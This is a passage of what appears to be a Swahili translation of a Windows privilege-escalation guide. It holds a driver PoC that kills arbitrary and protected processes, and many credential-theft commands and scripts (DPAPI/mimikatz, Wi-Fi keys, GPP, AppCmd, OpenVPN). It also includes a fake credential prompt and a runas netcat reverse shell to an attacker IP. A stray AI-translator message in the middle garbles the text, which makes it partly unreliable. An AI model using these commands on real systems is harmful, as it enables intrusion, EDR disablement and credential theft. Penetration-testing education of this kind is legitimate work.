Mara mtumiaji anapoweza kufungua device, IOCTLs za privileged zilizofichuliwa na driver zinaweza kutumiwa kwa LPE na tampering. Mfano wa uwezo uliobainika kwa wabunge:
- Kurudisha full-access handles kwa arbitrary processes (token theft / SYSTEM shell via DuplicateTokenEx/CreateProcessAsUser).
- Unrestricted raw disk read/write (offline tampering, boot-time persistence tricks).
- Kuua arbitrary processes, ikiwa ni pamoja na Protected Process/Light (PP/PPL), kuwezesha AV/EDR kill kutoka user land kupitia kernel.
Minimal PoC pattern (user mode):
// Example based on a vulnerable antimalware driver
#define IOCTL_REGISTER_PROCESS 0x80002010
#define IOCTL_TERMINATE_PROCESS 0x80002048
HANDLE h = CreateFileA("\\\\.\\amsdk\\anyfile", GENERIC_READ|GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, 0);
DWORD me = GetCurrentProcessId();
DWORD target = /* PID to kill or open */;
DeviceIoControl(h, IOCTL_REGISTER_PROCESS, &me, sizeof(me), 0, 0, 0, 0);
DeviceIoControl(h, IOCTL_TERMINATE_PROCESS, &target, sizeof(target), 0, 0, 0, 0);
Hatua za kupunguza kwa waendelezaji
- Daima weka FILE_DEVICE_SECURE_OPEN wakati unapotengeneza device objects zinazokusudiwa kuzuiliwa na DACL.
- Thibitisha caller context kwa operesheni zenye ruhusa (privileged operations). Ongeza PP/PPL checks kabla ya kuruhusu process termination au handle returns.
- Zuia IOCTLs (access masks, METHOD_*, input validation) na zingatia modeli za brokered badala ya direct kernel privileges.
Mawazo ya utambuzi kwa walinzi
- Fuatilia user-mode opens za majina ya device yanayoshukiwa (e.g., \ .\amsdk*) na mfululizo maalum wa IOCTL unaoashiria matumizi mabaya.
- Tekeleza Microsoft’s vulnerable driver blocklist (HVCI/WDAC/Smart App Control) na udumishe allow/deny lists zako.
PATH DLL Hijacking
Ikiwa una write permissions inside a folder present on PATH unaweza kuwa na uwezo wa hijack a DLL inayopakiwa na process na escalate privileges.
Angalia permissions za folder zote ndani ya PATH:
for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. )
Kwa maelezo zaidi kuhusu jinsi ya kutumia vibaya ukaguzi huu:
Writable Sys Path +Dll Hijacking Privesc
Network
Shares
net view #Get a list of computers
net view /all /domain [domainname] #Shares on the domains
net view \\computer /ALL #List shares of a computer
net use x: \\computer\share #Mount the share locally
net share #Check current shares
hosts file
Angalia kompyuta nyingine zinazojulikana zilizohardcoded kwenye hosts file
type C:\Windows\System32\drivers\etc\hosts
Viunganisho vya Mtandao & DNS
ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
Bandari Zilizofunguka
Angalia kama kuna huduma zilizozuiliwa zinazoonekana kutoka nje
netstat -ano #Opened ports?
Jedwali la Upangaji Njia
route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
Jedwali la ARP
arp -A
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,L
Firewall Rules
Check this page for Firewall related commands (orodhesha sheria, unda sheria, zimisha, zimisha…)
Zaidi commands for network enumeration here
Windows Subsystem for Linux (wsl)
C:\Windows\System32\bash.exe
C:\Windows\System32\wsl.exe
Fayili ya binari bash.exe pia inaweza kupatikana katika C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe
Ikiwa unapata mtumiaji root, unaweza kusikiliza kwenye port yoyote (mara ya kwanza unapotumia nc.exe kusikiliza port itakuuliza kupitia GUI ikiwa nc inapaswa kuruhusiwa na firewall).
wsl whoami
./ubuntun1604.exe config --default-user root
wsl whoami
wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'
Ili kuanzisha bash kama root kwa urahisi, jaribu --default-user root
Unaweza kuchunguza mfumo wa faili wa WSL katika folda C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\
Vyeti za Windows
Vyeti za Winlogon
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername"
#Other way
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultPassword
Meneja wa vitambulisho / Windows vault
From https://www.neowin.net/news/windows-7-exploring-credential-manager-and-windows-vault\
Windows Vault inahifadhi vitambulisho vya watumiaji kwa seva, tovuti na programu nyingine ambazo Windows inaweza kuzitumia kuingia kwa watumiaji moja kwa moja. Awali inaweza kuonekana kuwa watumiaji wanaweza kuhifadhi vitambulisho vya Facebook, Twitter, Gmail n.k., ili wajitoe kuingia moja kwa moja kupitia vivinjari. Lakini si hivyo.
Windows Vault inahifadhi vitambulisho ambavyo Windows inaweza kutumia kuingia kwa watumiaji moja kwa moja, ambayo inamaanisha kwamba programu yoyote ya Windows ambayo inahitaji vitambulisho kufikia rasilimali (server au tovuti) inaweza kutumia Credential Manager hii na Windows Vault na kutumia vitambulisho vilivyotolewa badala ya watumiaji kuingiza jina la mtumiaji na nenosiri kila wakati.
Isipokuwa programu zinaingiliana na Credential Manager, siamini inawezekana kwao kutumia vitambulisho kwa rasilimali fulani. Hivyo, ikiwa programu yako inataka kutumia vault, inapaswa kwa namna fulani kuwasiliana na Credential Manager na kuomba vitambulisho kwa rasilimali hiyo kutoka kwa vault ya uhifadhi ya chaguo-msingi.
Tumia cmdkey kuorodhesha vitambulisho vilivyohifadhiwa kwenye mashine.
cmdkey /list
Currently stored credentials:
Target: Domain:interactive=WORKGROUP\Administrator
Type: Domain Password
User: WORKGROUP\Administrator
Kisha unaweza kutumia runas kwa chaguo la /savecred ili kutumia credentials zilizohifadhiwa. Mfano ufuatao unaitisha binary ya mbali kupitia SMB share.
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"
Kutumia runas na seti ya credential zilizotolewa.
C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"
Kumbuka kwamba mimikatz, lazagne, credentialfileview, VaultPasswordView, au kutoka kwa Empire Powershells module.
DPAPI
The Data Protection API (DPAPI) hutoa njia ya usimbaji fiche wa symmetric wa data, inayotumika sana ndani ya mfumo wa uendeshaji wa Windows kwa usimbaji fiche wa symmetric wa funguo binafsi za asymmetric. Usimbaji fiche huu unatumia siri ya mtumiaji au ya mfumo ili kuchangia kwa kiasi kikubwa katika entropy.
DPAPI enables the encryption of keys through a symmetric key that is derived from the user’s login secrets. Katika matukio yanayohusisha usimbaji fiche wa mfumo, hutumia siri za uthibitishaji za domain ya mfumo.
Funguo za RSA za mtumiaji zilizofichwa kwa kutumia DPAPI zimehifadhiwa katika saraka ya %APPDATA%\Microsoft\Protect\{SID}, ambapo {SID} inawakilisha Security Identifier ya mtumiaji. The DPAPI key, co-located with the master key that safeguards the user’s private keys in the same file, kwa kawaida inaundwa na 64 bytes za data za nasibu. (Ni muhimu kutambua kwamba ufikiaji wa saraka hii umezuiwa, ukizuia kuorodhesha yaliyomo kwa kutumia amri ya dir katika CMD, ingawa inaweza kuorodheshwa kupitia PowerShell).
Get-ChildItem C:\Users\USER\AppData\Roaming\Microsoft\Protect\
Get-ChildItem C:\Users\USER\AppData\Local\Microsoft\Protect\
Unaweza kutumia mimikatz module dpapi::masterkey na hoja zinazofaa (/pvk au /rpc) ili ku-decrypt.
Mafaili ya credentials files protected by the master password kwa kawaida huwa ziko katika:
dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\
Unaweza kutumia mimikatz module dpapi::cred pamoja na /masterkey inayofaa ili ku-decrypt.
Unaweza kunakili masterkeys nyingi za DPAPI kutoka memory kwa kutumia sekurlsa::dpapi module (ikiwa wewe ni root).
PowerShell Credentials
PowerShell credentials mara nyingi hutumika kwa ajili ya scripting na kazi za automation kama njia rahisi ya kuhifadhi credentials zilizofichwa kwa urahisi. Credentials zinalindwa kwa kutumia DPAPI, na kawaida hii ina maana kwamba zinaweza ku-decrypt tu na mtumiaji yule yule kwenye kompyuta ile ile zilipotengenezwa.
Ili decrypt PS credentials kutoka kwenye faili inayohifadhi, unaweza kufanya:
PS C:\> $credential = Import-Clixml -Path 'C:\pass.xml'
PS C:\> $credential.GetNetworkCredential().username
john
PS C:\htb> $credential.GetNetworkCredential().password
JustAPWD!
Wifi
#List saved Wifi using
netsh wlan show profile
#To get the clear-text password use
netsh wlan show profile <SSID> key=clear
#Oneliner to extract all wifi passwords
cls & echo. & for /f "tokens=3,* delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name="%b" key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on*
Saved RDP Connections
Muunganisho za RDP zilizohifadhiwa
Unaweza kuzipata kwenye HKEY_USERS\<SID>\Software\Microsoft\Terminal Server Client\Servers\
na katika HKCU\Software\Microsoft\Terminal Server Client\Servers\
Recently Run Commands
Amri zilizotekelezwa hivi karibuni
HCU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
HKCU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
Msimamizi wa Cheti za Desktop ya Mbali
%localappdata%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings
Tumia the Mimikatz dpapi::rdg module na /masterkey inayofaa ili decrypt any .rdg files
Unaweza extract many DPAPI masterkeys kutoka kwa memory kwa kutumia Mimikatz sekurlsa::dpapi module
Sticky Notes
Watu mara nyingi hutumia StickyNotes app kwenye workstations za Windows ili save passwords na taarifa nyingine, bila kutambua kuwa ni faili ya database. Faili hii iko kwenye C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite na ni muhimu kila wakati kuitafuta na kuichunguza.
AppCmd.exe
Note that to recover passwords from AppCmd.exe you need to be Administrator and run under a High Integrity level.
AppCmd.exe iko kwenye %systemroot%\system32\inetsrv\ directory.
Ikiwa faili hii ipo basi inawezekana kwamba baadhi ya credentials zimewekwa na zinaweza kuwa recovered.
Msimbo huu umetolewa kutoka PowerUP:
function Get-ApplicationHost {
$OrigError = $ErrorActionPreference
$ErrorActionPreference = "SilentlyContinue"
# Check if appcmd.exe exists
if (Test-Path ("$Env:SystemRoot\System32\inetsrv\appcmd.exe")) {
# Create data table to house results
$DataTable = New-Object System.Data.DataTable
# Create and name columns in the data table
$Null = $DataTable.Columns.Add("user")
$Null = $DataTable.Columns.Add("pass")
$Null = $DataTable.Columns.Add("type")
$Null = $DataTable.Columns.Add("vdir")
$Null = $DataTable.Columns.Add("apppool")
# Get list of application pools
Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppools /text:name" | ForEach-Object {
# Get application pool name
$PoolName = $_
# Get username
$PoolUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.username"
$PoolUser = Invoke-Expression $PoolUserCmd
# Get password
$PoolPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.password"
$PoolPassword = Invoke-Expression $PoolPasswordCmd
# Check if credentials exists
if (($PoolPassword -ne "") -and ($PoolPassword -isnot [system.array])) {
# Add credentials to database
$Null = $DataTable.Rows.Add($PoolUser, $PoolPassword,'Application Pool','NA',$PoolName)
}
}
# Get list of virtual directories
Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir /text:vdir.name" | ForEach-Object {
# Get Virtual Directory Name
$VdirName = $_
# Get username
$VdirUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:userName"
$VdirUser = Invoke-Expression $VdirUserCmd
# Get password
$VdirPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:password"
$VdirPassword = Invoke-Expression $VdirPasswordCmd
# Check if credentials exists
if (($VdirPassword -ne "") -and ($VdirPassword -isnot [system.array])) {
# Add credentials to database
$Null = $DataTable.Rows.Add($VdirUser, $VdirPassword,'Virtual Directory',$VdirName,'NA')
}
}
# Check if any passwords were found
if( $DataTable.rows.Count -gt 0 ) {
# Display results in list view that can feed into the pipeline
$DataTable | Sort-Object type,user,pass,vdir,apppool | Select-Object user,pass,type,vdir,apppool -Unique
}
else {
# Status user
Write-Verbose 'No application pool or virtual directory passwords were found.'
$False
}
}
else {
Write-Verbose 'Appcmd.exe does not exist in the default location.'
$False
}
$ErrorActionPreference = $OrigError
}
SCClient / SCCM
Angalia kama C:\Windows\CCM\SCClient.exe inapatikana .
Wasakinishaji huendeshwa kwa SYSTEM privileges, wengi wao wako dhaifu kwa DLL Sideloading (Taarifa kutoka https://github.com/enjoiz/Privesc).
$result = Get-WmiObject -Namespace "root\ccm\clientSDK" -Class CCM_Application -Property * | select Name,SoftwareVersion
if ($result) { $result }
else { Write "Not Installed." }
Faili na Registry (Credentials)
Putty Creds
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s | findstr "HKEY_CURRENT_USER HostName PortNumber UserName PublicKeyFile PortForwardings ConnectionSharing ProxyPassword ProxyUsername" #Check the values saved in each session, user/password could be there
Putty SSH Funguo za Mwenyeji
reg query HKCU\Software\SimonTatham\PuTTY\SshHostKeys\
SSH keys katika rejista
SSH private keys zinaweza kuhifadhiwa ndani ya registry key HKCU\Software\OpenSSH\Agent\Keys, kwa hivyo unapaswa kuangalia kama kuna kitu cha kuvutia huko:
reg query 'HKEY_CURRENT_USER\Software\OpenSSH\Agent\Keys'
Ikiwa utapata kipengee chochote ndani ya njia hiyo, kuna uwezekano ni saved SSH key. Imehifadhiwa kwa njia iliyosimbwa (encrypted) lakini inaweza kufichuliwa kwa urahisi kwa kutumia https://github.com/ropnop/windows_sshagent_extract.
Taarifa zaidi kuhusu mbinu hii hapa: https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/
Ikiwa huduma ya ssh-agent haifanyi kazi na unataka ianze moja kwa moja wakati wa kuanza mfumo, endesha:
Get-Service ssh-agent | Set-Service -StartupType Automatic -PassThru | Start-Service
Tip
Inaonekana mbinu hii haifanyi kazi tena. Nilijaribu kuunda funguo za ssh, kuziongeza kwa
ssh-addna kuingia kwa ssh kwenye mashine. Rejista HKCU\Software\OpenSSH\Agent\Keys haipo na procmon haikuonyesha matumizi yadpapi.dllwakati wa asymmetric key authentication.
Faili zisizo na uangalizi
C:\Windows\sysprep\sysprep.xml
C:\Windows\sysprep\sysprep.inf
C:\Windows\sysprep.inf
C:\Windows\Panther\Unattended.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\System32\Sysprep\unattend.xml
C:\Windows\System32\Sysprep\unattended.xml
C:\unattend.txt
C:\unattend.inf
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
Unaweza pia kutafuta faili hizi ukitumia metasploit: post/windows/gather/enum_unattend
Mfano wa yaliyomo:
<component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
<AutoLogon>
<Password>U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo==</Password>
<Enabled>true</Enabled>
<Username>Administrateur</Username>
</AutoLogon>
<UserAccounts>
<LocalAccounts>
<LocalAccount wcm:action="add">
<Password>*SENSITIVE*DATA*DELETED*</Password>
<Group>administrators;users</Group>
<Name>Administrateur</Name>
</LocalAccount>
</LocalAccounts>
</UserAccounts>
SAM & SYSTEM chelezo
# Usually %SYSTEMROOT% = C:\Windows
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
Cloud Credentials
#From user home
.aws\credentials
AppData\Roaming\gcloud\credentials.db
AppData\Roaming\gcloud\legacy_credentials
AppData\Roaming\gcloud\access_tokens.db
.azure\accessTokens.json
.azure\azureProfile.json
McAfee SiteList.xml
Cached GPP Password
Kipengele kilikuwepo hapo awali kilichoruhusu kusambaza akaunti za mtaalamu wa ndani zilizobinafsishwa kwenye kikundi cha mashine kupitia Group Policy Preferences (GPP). Hata hivyo, njia hii ilikuwa na dosari kubwa za usalama. Kwanza, Group Policy Objects (GPOs), zilizohifadhiwa kama faili za XML katika SYSVOL, zingeweza kufikiwa na mtumiaji yeyote wa domain. Pili, nywila ndani ya GPP hizi, zilizofichwa kwa AES256 kwa kutumia ufunguo wa kimsingi ulioripotiwa hadharani, zingeweza kufichuliwa na mtumiaji yeyote aliyethibitishwa. Hii ilileta hatari kubwa, kwani ingemruhusu mtumiaji kupata viwango vya juu vya ruhusa.
Ili kupunguza hatari hii, ilitengenezwa function iliyotumika kutafuta faili za GPP zilizohifadhiwa kwa ndani zenye uwanja wa “cpassword” usio tupu. Kutakapopatikana faili kama hiyo, function hu-decrypt nenosiri na kurudisha custom PowerShell object. Kitu hiki kinajumuisha maelezo kuhusu GPP na eneo la faili, kusaidia utambuzi na kurekebisha udhaifu huu wa usalama.
Search in C:\ProgramData\Microsoft\Group Policy\history or in C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history (previous to W Vista) for these files:
- Groups.xml
- Services.xml
- Scheduledtasks.xml
- DataSources.xml
- Printers.xml
- Drives.xml
To decrypt the cPassword:
#To decrypt these passwords you can decrypt it using
gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw
Kutumia crackmapexec kupata passwords:
crackmapexec smb 10.10.10.10 -u username -p pwd -M gpp_autologin
IIS Usanidi wa Wavuti
Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
C:\inetpub\wwwroot\web.config
Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
Get-Childitem –Path C:\xampp\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
Mfano wa web.config lenye credentials:
<authentication mode="Forms">
<forms name="login" loginUrl="/admin">
<credentials passwordFormat = "Clear">
<user name="Administrator" password="SuperAdminPassword" />
</credentials>
</forms>
</authentication>
Vyeti vya OpenVPN
Add-Type -AssemblyName System.Security
$keys = Get-ChildItem "HKCU:\Software\OpenVPN-GUI\configs"
$items = $keys | ForEach-Object {Get-ItemProperty $_.PsPath}
foreach ($item in $items)
{
$encryptedbytes=$item.'auth-data'
$entropy=$item.'entropy'
$entropy=$entropy[0..(($entropy.Length)-2)]
$decryptedbytes = [System.Security.Cryptography.ProtectedData]::Unprotect(
$encryptedBytes,
$entropy,
[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
Write-Host ([System.Text.Encoding]::Unicode.GetString($decryptedbytes))
}
Marekodi
# IIS
C:\inetpub\logs\LogFiles\*
#Apache
Get-Childitem –Path C:\ -Include access.log,error.log -File -Recurse -ErrorAction SilentlyContinue
Omba credentials
Unaweza kila wakati kuomba mtumiaji aingize credentials zake au hata credentials za mtumiaji mwingine ikiwa unadhani anaweza kujua (kumbuka kwamba kuomba mteja moja kwa moja kwa credentials ni hatari sana):
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\\'+'anotherusername',[Environment]::UserDomainName); $cred.getnetworkcredential().password
#Get plaintext
$cred.GetNetworkCredential() | fl
Majina ya faili yanayoweza kuwa na credentials
Faili zilizoonekana hapo awali ambazo wakati fulani zilikuwa na passwords katika clear-text au Base64
$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history
vnc.ini, ultravnc.ini, *vnc*
web.config
php.ini httpd.conf httpd-xampp.conf my.ini my.cnf (XAMPP, Apache, PHP)
SiteList.xml #McAfee
ConsoleHost_history.txt #PS-History
*.gpg
*.pgp
*config*.php
elasticsearch.y*ml
kibana.y*ml
*.p12
*.der
*.csr
*.cer
known_hosts
id_rsa
id_dsa
*.ovpn
anaconda-ks.cfg
hostapd.conf
rsyncd.conf
cesi.conf
supervisord.conf
tomcat-users.xml
*.kdbx
KeePass.config
Ntds.dit
SAM
SYSTEM
FreeSSHDservice.ini
access.log
error.log
server.xml
ConsoleHost_history.txt
setupinfo
setupinfo.bak
key3.db #Firefox
key4.db #Firefox
places.sqlite #Firefox
"Login Data" #Chrome
Cookies #Chrome
Bookmarks #Chrome
History #Chrome
TypedURLsTime #IE
TypedURLs #IE
%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\iis6.log
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
I don’t have access to your filesystem or repository. Please paste the contents of src/windows-hardening/windows-local-privilege-escalation/README.md (or the list of proposed files) here. Once you provide the content I will translate the relevant English to Swahili, preserving all markdown, tags, links, paths and code as you requested.
cd C:\
dir /s/b /A:-D RDCMan.settings == *.rdg == *_history* == httpd.conf == .htpasswd == .gitconfig == .git-credentials == Dockerfile == docker-compose.yml == access_tokens.db == accessTokens.json == azureProfile.json == appcmd.exe == scclient.exe == *.gpg$ == *.pgp$ == *config*.php == elasticsearch.y*ml == kibana.y*ml == *.p12$ == *.cer$ == known_hosts == *id_rsa* == *id_dsa* == *.ovpn == tomcat-users.xml == web.config == *.kdbx == KeePass.config == Ntds.dit == SAM == SYSTEM == security == software == FreeSSHDservice.ini == sysprep.inf == sysprep.xml == *vnc*.ini == *vnc*.c*nf* == *vnc*.txt == *vnc*.xml == php.ini == https.conf == https-xampp.conf == my.ini == my.cnf == access.log == error.log == server.xml == ConsoleHost_history.txt == pagefile.sys == NetSetup.log == iis6.log == AppEvent.Evt == SecEvent.Evt == default.sav == security.sav == software.sav == system.sav == ntuser.dat == index.dat == bash.exe == wsl.exe 2>nul | findstr /v ".dll"
Get-Childitem –Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like "*.xml" -or $_.Name -like "*.txt" -or $_.Name -like "*.ini")}
Vitambulisho katika RecycleBin
Unapaswa pia kuangalia Bin kutafuta vitambulisho ndani yake
Ili kupona nywila zilizohifadhiwa na programu kadhaa unaweza kutumia: http://www.nirsoft.net/password_recovery_tools.html
Ndani ya registry
Vifunguo vingine vya registry vinavyoweza kuwa na vitambulisho
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s
reg query "HKCU\Software\TightVNC\Server"
reg query "HKCU\Software\OpenSSH\Agent\Key"
Extract openssh keys from registry.
Historia ya Vivinjari
Unapaswa kuangalia dbs ambapo nywila kutoka kwa Chrome or Firefox zinahifadhiwa.
Pia angalia historia, bookmarks na favourites za vivinjari kwa sababu pengine baadhi ya passwords are zimehifadhiwa hapo.
Tools to extract passwords from browsers:
- Mimikatz:
dpapi::chrome - SharpWeb
- SharpChromium
- SharpDPAPI
COM DLL Overwriting
Component Object Model (COM) ni teknolojia iliyojengwa ndani ya mfumo wa uendeshaji wa Windows inayoruhusu intercommunication kati ya vipengee vya programu vilivyotengenezwa kwa lugha mbalimbali. Kila sehemu ya COM inatambulishwa kwa njia ya class ID (CLSID) na kila sehemu huonyesha utendakazi kupitia interface moja au zaidi, zinazotambulishwa kwa interface IDs (IIDs).
COM classes and interfaces are defined in the registry under HKEY\CLASSES\ROOT\CLSID and HKEY\CLASSES\ROOT\Interface respectively. This registry is created by merging the HKEY\LOCAL\MACHINE\Software\Classes + HKEY\CURRENT\USER\Software\Classes = HKEY\CLASSES\ROOT.
Inside the CLSIDs of this registry you can find the child registry InProcServer32 which contains a default value pointing to a DLL and a value called ThreadingModel that can be Apartment (Single-Threaded), Free (Multi-Threaded), Both (Single or Multi) or Neutral (Thread Neutral).
.png)
Kwa kifupi, ikiwa unaweza overwrite any of the DLLs zitakazotekelezwa, unaweza escalate privileges ikiwa DLL hiyo itatekelezwa na mtumiaji tofauti.
To learn how attackers use COM Hijacking as a persistence mechanism check:
Generic Password search in files and registry
Search for file contents
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config
findstr /spin "password" *.*
Tafuta faili lenye jina fulani
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini
Tafuta rejista kwa majina ya funguo na nenosiri
REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K
REG QUERY HKLM /F "password" /t REG_SZ /S /d
REG QUERY HKCU /F "password" /t REG_SZ /S /d
Zana zinazotafuta passwords
MSF-Credentials Plugin ni plugin ya msf niliitengeneza plugin hii ili automatically execute every metasploit POST module that searches for credentials ndani ya mwathiriwa.
Winpeas inatafuta moja kwa moja faili zote zenye passwords zilizotajwa kwenye ukurasa huu.
Lazagne ni zana nyingine nzuri ya kutoa passwords kutoka kwenye mfumo.
Zana SessionGopher inatafuta sessions, usernames na passwords za zana kadhaa ambazo zinaweka data hii kwa clear text (PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP)
Import-Module path\to\SessionGopher.ps1;
Invoke-SessionGopher -Thorough
Invoke-SessionGopher -AllDomain -o
Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
Leaked Handlers
Fikiria kwamba mchakato unaoendesha kama SYSTEM unafungua mchakato mpya (OpenProcess()) na full access. Mchakato huo huo pia unaunda mchakato mpya (CreateProcess()) enye privileges ndogo lakini unaoirithisha handles zote zilizofunguliwa za mchakato mkuu.
Kisha, ikiwa una full access kwa mchakato wenye privileges ndogo, unaweza kuchukua handle iliyofunguliwa ya mchakato wenye privileges iliyoundwa na OpenProcess() na kuingiza shellcode.
Soma mfano huu kwa taarifa zaidi kuhusu jinsi ya kugundua na kutumia udhaifu huu.
Soma chapisho hiki kingine kwa maelezo kamili zaidi kuhusu jinsi ya kujaribu na kutumia vibaya handles zaidi za michakato na threads zilizoirithiwa zenye viwango tofauti vya ruhusa (si tu full access).
Named Pipe Client Impersonation
Sehemu za kumbukumbu zilizoshirikiwa, zinazoitwa pipes, zinawezesha mawasiliano ya michakato na uhamisho wa data.
Windows inatoa kipengele kinachoitwa Named Pipes, kuruhusu michakato isiyohusiana kushiriki data, hata kwenye mitandao tofauti. Hii inafanana na usanifu wa client/server, ambapo majukumu yamefafanuliwa kama named pipe server na named pipe client.
Wakati data inapotumwa kupitia pipe na client, server iliyoweka pipe ina uwezo wa kuchukua utambulisho wa client, ikiwa ina haki za SeImpersonate. Kutambua mchakato wenye privileges unaozungumza kupitia pipe ambayo unaweza kuiga kunatoa fursa ya kupata privileges za juu kwa kutumia utambulisho wa mchakato huo mara utakapoingiliana na pipe uliyoanzisha. Kwa maelekezo ya jinsi ya kutekeleza shambulio kama hilo, mwongozo wenye msaada upo hapa na hapa.
Pia zana ifuatayo inaruhusu kukamata komunikeshini ya named pipe kwa zana kama burp: https://github.com/gabriel-sztejnworcel/pipe-intercept na zana hii inaruhusu kuorodhesha na kuona pipes zote ili kupata privescs https://github.com/cyberark/PipeViewer
Telephony tapsrv remote DWORD write to RCE
Telephony service (TapiSrv) katika mode ya server inaonyesha \\pipe\\tapsrv (MS-TRP). Remote authenticated client inaweza kutumia vibaya njia ya event isiyo synchronous inayotumia mailslot kubadilisha ClientAttach kuwa uandishi wowote wa 4-byte kwa faili yoyote iliyopo inayoweza kuandikwa na NETWORK SERVICE, kisha kupata haki za admin za Telephony na kupakia DLL yoyote kama service. Mtiririko kamili:
ClientAttachnapszDomainUserikiteuliwa kuwa njia inayoweza kuandikwa iliyopo → service inaiweka wazi kupitiaCreateFileW(..., OPEN_EXISTING)na kuitumia kwa uandishi wa async event.- Kila tukio linaandika
